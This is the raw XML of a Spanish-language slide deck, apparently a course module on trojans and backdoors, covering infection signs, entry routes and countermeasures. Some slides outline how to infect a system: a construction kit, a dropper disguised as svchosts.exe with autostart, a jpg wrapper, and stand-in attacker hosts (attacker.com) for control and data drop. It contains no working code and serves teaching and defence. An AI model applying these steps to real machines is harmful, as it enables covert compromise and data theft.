              <a:t>12. Ejecutar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>versiones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>locales de antivirus, firewall e IDS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>13. Restringir permisos entre los ambientes de escritorio para prevenir la instalación de aplicaciones maliciosas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0" smtClean="0"/>
              <a:t>(cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334113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lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Y especialmente ¡EDUCAR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>A LOS USUARIOS!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3090927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los troyanos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Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Horse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Contruction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Kit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ayuda a los atacantes a crear sus propios troyanos. Estas herramientas pueden ser peligrosas si no se ejecutan apropiadamente. También pueden ser detectadas puesto que utilizan código redundante.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Anti-Troyano</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>TrojanHunter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Emsisoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Anti-Malware, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3763098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a:xfrm>
            <a:off x="323528" y="2636912"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Test de Intrusión para Troyanos</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38931512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40287" y="541734"/>
            <a:ext cx="6738504" cy="5839593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1695946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Indicaciones de ataque troyano</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>El DVD se abre o cierra solo, navegador se redirige solo, antivirus se deshabilita, la barra de tareas desaparece, extrañas cajas aparecen, el color del S.O. cambia, contraseñas cambiadas sin autorización, la pantalla se vuelve extraña, cambia la configuración del fondo de pantalla o protector de pantalla. IPS se queja de que el IP del equipo está haciendo escaneos. Compras extrañas en la tarjeta de crédito. Inversión en los botones del mouse. Que la gente sepa mucha información personal de una victima. El monitor se enciende y apaga solo. Documentos y mensajes se imprimen solos. El puntero del mouse desaparece o mueve solo. El equipo se apaga solo. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Ctrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Alt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Surp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t> no funciona.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2527083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396141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Infectando un sistema con un Troyano</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>1. Crear un nuevo troyano utilizando un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Horse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Construction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t> Kit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>2. Crear un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>dropper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>, que es parte de un paquete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>troyanizado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t> que instala el código malicioso en el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0" smtClean="0"/>
              <a:t>sistema.</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>Ejemplo de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>dropper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Ruta de instalación: C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:\Windows\system32\svchosts.exe</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Autostart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>HKLM\Software\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Micr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>....\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>\Iexplorer.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Código Malicioso:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>: cliente.attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Dropzone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>: dropzone.attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Wrapper</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>: my_name.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t> data: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t>Graphic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2000" dirty="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262572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Infectando un sistema con un Troyano</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>3. Crear un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>utilizando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>herramientas para instalar el troyano en el equipo de la victima</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>4. Propagar el troyano (generalmente se contagian las redes P2P como el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>kazaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>5. Ejecutar el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>dropper</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>6. Ejecutar la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>damage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>routine</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201008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Wrapper</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800" dirty="0" smtClean="0"/>
              <a:t>Une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>un troyano ejecutable a una aplicación .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> con aspecto inocente, como juegos, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Cuando la víctima ejecuta el .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>, primero se instala el troyano en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>background</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> y luego ejecuta la aplicación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>wrapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>foreground</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Ambos programas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>están </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>unidos dentro de un archivo simple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Ejemplos de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>conver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>programs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Kriptomatik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>joiner</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173301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smtClean="0"/>
              <a:t>¿Cómo un troyano puede entrar a un sistema?</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Programa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>falso. </a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Descargando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>archivos, juegos, programas, etc. </a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Sitios </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de descarga de software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>freeware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>NetBIOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>filesharing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Aplicaciones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Instant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Messenger. IRC. </a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Archivos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>adjuntos. </a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Acceso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>físico. </a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Bugs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>en mails y navegadores.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214165255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39</TotalTime>
  <Words>2411</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Presentación en pantalla (4:3)</PresentationFormat>
  <Paragraphs>259</Paragraphs>
  <Slides>50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Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Microsoft New Tai Lue</vt:lpstr>
      <vt:lpstr>Blue-Grey-PowerPoint-Template</vt:lpstr>
      <vt:lpstr>6. Troyanos y Backdoors</vt:lpstr>
      <vt:lpstr>Troyanos</vt:lpstr>
      <vt:lpstr>Su propósito</vt:lpstr>
      <vt:lpstr>Su propósito</vt:lpstr>
      <vt:lpstr>Indicaciones de ataque troyano</vt:lpstr>
      <vt:lpstr>Infectando un sistema con un Troyano</vt:lpstr>
      <vt:lpstr>Infectando un sistema con un Troyano</vt:lpstr>
      <vt:lpstr>Wrapper</vt:lpstr>
      <vt:lpstr>¿Cómo un troyano puede entrar a un sistema?</vt:lpstr>
      <vt:lpstr>Desplegar un troyano</vt:lpstr>
      <vt:lpstr>Técnicas para evadir antivirus.</vt:lpstr>
      <vt:lpstr>Tipos de troyanos</vt:lpstr>
      <vt:lpstr>Troyanos Command Shell</vt:lpstr>
      <vt:lpstr>Ejemplo con netcat</vt:lpstr>
      <vt:lpstr>Troyanos Botnet</vt:lpstr>
      <vt:lpstr>Troyanos Proxy Server</vt:lpstr>
      <vt:lpstr>Troyanos FTP</vt:lpstr>
      <vt:lpstr>Troyanos VNC </vt:lpstr>
      <vt:lpstr>Troyanos HTTP/HTTPS</vt:lpstr>
      <vt:lpstr>Troyanos ICMP</vt:lpstr>
      <vt:lpstr>Troyanos de acceso remoto</vt:lpstr>
      <vt:lpstr>Troyanos CCTT (Covert Channel Tunneling Trojan)</vt:lpstr>
      <vt:lpstr>Troyanos E-banking</vt:lpstr>
      <vt:lpstr>Troyanos destructivos</vt:lpstr>
      <vt:lpstr>Troyanos de notificación</vt:lpstr>
      <vt:lpstr>Troyanos de tarjetas de crédito</vt:lpstr>
      <vt:lpstr>Troyanos Data Hiding (Troyanos encriptados)</vt:lpstr>
      <vt:lpstr>Troyano de Blakberry: PhoneSnoop</vt:lpstr>
      <vt:lpstr>Troyano MAC OS X: DNSChanger</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Como detectar Troyanos</vt:lpstr>
      <vt:lpstr>Contramedidas para los troyanos</vt:lpstr>
      <vt:lpstr>Contramedidas para los troyanos</vt:lpstr>
      <vt:lpstr>Contramedidas para los troyanos</vt:lpstr>
      <vt:lpstr>Contramedidas para los troyanos</vt:lpstr>
      <vt:lpstr>Contramedidas para los troyanos</vt:lpstr>
      <vt:lpstr>Test de Intrusión para Troyanos</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14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-11-09T01:50:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-07-07T23:16:25Z</dcterms:modified>
</cp:coreProperties>
</file>